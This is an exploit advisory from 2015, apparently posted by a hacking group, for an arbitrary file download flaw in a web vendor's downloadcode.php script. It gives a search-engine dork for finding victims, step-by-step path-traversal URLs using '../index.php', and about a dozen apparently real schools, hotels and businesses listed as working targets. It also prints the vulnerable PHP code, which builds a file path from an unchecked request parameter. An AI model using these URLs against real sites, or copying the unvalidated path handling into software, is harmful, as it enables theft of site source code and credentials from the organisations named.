|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |--------------------------------------------------------------| |[+] Exploit Title: Shadow Infosystem Arbitrary File Download |[+] |[+] Exploit Author: Ashiyane Digital Security Team |[+] |[+] Vendor Homepage: http://shadowinfosystem.com |[+] |[+] Google Dork: inurl:/downloadcode.php |[+] |[+] Tested on: Windows, Linux |[+] |[+] Date: 2015.09.21 |[+] |--------------------------------------------------------------| |[+] Describe : |[+] |[+] At the first search dork and choose a target |[+] |[+] Like this : http://www.spacetechgroup.in |[+] |[+] Add this to the end of target URL: downloadcode.php?d= |[+] |[+] After [?d=] you should enter your file name that you want to download! |[+] |[+] Fore example download in that target index.php: |[+] |[+] http://www.spacetechgroup.in/downloadcode.php?d=../index.php |[+] |[+] In some targets you can only download files that they're in [Current] directory! |[+] |[+] But I don't want to download from [file] directory! |[+] |[+] Then I put [../] after file name to upload from root directory! |--------------------------------------------------------------| |[+] Examples : |[+] |[+] http://stteresaschool.in/downloadcode.php?d=../index.php |[+] |[+] http://hotelsroyalpark.coM/downloadcode.php?d=../index.php |[+] |[+] http://jkgttAcademy.com/downloadcode.php?d=index.php |[+] |[+] http://raksHatowersgurgaon.com/downloadcode.php?d=../index.php |[+] |[+] http://shaDowInfosystem.com/downloadcode.php?d=../index.php |[+] |[+] http://keltecHgroup.com/downloadcode.php?download_file=index.php |[+] |[+] http://fnfhomez.com/downloadcode.php?df=../index.php |[+] |[+] http://renownedInfra.com/downloadcode.php?download_file=../index.php |[+] |[+] http://mmgroupinDia.com/downloadcode.php?df=../index.php |[+] |[+] http://sunflowerpublicschool.com/downloadcode.php?file=../index.php |[+] |[+] http://hitchintak.in/downloadcode.php?d=../index.php |[+] |[+] http://ballyhai.net/downloadcode.php?file=../index.php |[+] |[+] http://spacetechgroup.in/downloadcode.php?d=../index.php |--------------------------------------------------------------| |[+] Vulnerable Code: |[+] File: downloadcode.php: <?php if(isset($_GET['d'])){ $path = "admin/"; // change the path to fit your websites document structure $fullPath = $path.$_GET['d']; }else if(isset($_REQUEST['pf'])){ $fullPath = "payment_pdf/".$_REQUEST['pf']; } if ($fd = fopen ($fullPath, "r")) { $fsize = filesize($fullPath); $path_parts = pathinfo($fullPath); $ext = strtolower($path_parts["extension"]); switch ($ext) { case "jpg": header("Content-type: application/jpg"); // add here more headers for diff. extensions header("Content-Disposition: attachment; filename=\"".$path_parts["basename"]."\""); // use 'attachment' to force a download break; default; header("Content-type: application/octet-stream"); header("Content-Disposition: filename=\"".$path_parts["basename"]."\""); case "pdf": header("Content-type: application/pdf"); // add here more headers for diff. extensions header("Content-Disposition: attachment; filename=\"".$path_parts["basename"]."\""); // use 'attachment' to force a download break; default; header("Content-type: application/octet-stream"); header("Content-Disposition: filename=\"".$path_parts["basename"]."\""); case "swf": header("Content-type: application/swf"); // add here more headers for diff. extensions header("Content-Disposition: attachment; filename=\"".$path_parts["basename"]."\""); // use 'attachment' to force a download break; default; header("Content-type: application/octet-stream"); header("Content-Disposition: filename=\"".$path_parts["basename"]."\""); case "doc": header("Content-type: application/doc"); // add here more headers for diff. extensions header("Content-Disposition: attachment; filename=\"".$path_parts["basename"]."\""); // use 'attachment' to force a download break; default; header("Content-type: application/octet-stream"); header("Content-Disposition: filename=\"".$path_parts["basename"]."\""); case "xls": header("Content-type: application/xls"); // add here more headers for diff. extensions header("Content-Disposition: attachment; filename=\"".$path_parts["basename"]."\""); // use 'attachment' to force a download break; default; header("Content-type: application/octet-stream"); header("Content-Disposition: filename=\"".$path_parts["basename"]."\""); case "docx": header("Content-type: application/docx"); // add here more headers for diff. extensions header("Content-Disposition: attachment; filename=\"".$path_parts["basename"]."\""); // use 'attachment' to force a download break; default; header("Content-type: application/octet-stream"); header("Content-Disposition: filename=\"".$path_parts["basename"]."\""); case "txt": header("Content-type: application/txt"); // add here more headers for diff. extensions header("Content-Disposition: attachment; filename=\"".$path_parts["basename"]."\""); // use 'attachment' to force a download break; default; header("Content-type: application/octet-stream"); header("Content-Disposition: filename=\"".$path_parts["basename"]."\""); } header("Content-length: $fsize"); header("Cache-control: private"); //use this to open files directly while(!feof($fd)) { $buffer = fread($fd, 22048); echo $buffer; } } fclose ($fd); exit; ?> |--------------------------------------------------------------| |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |[+] Discovered By : Cloner-47 |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|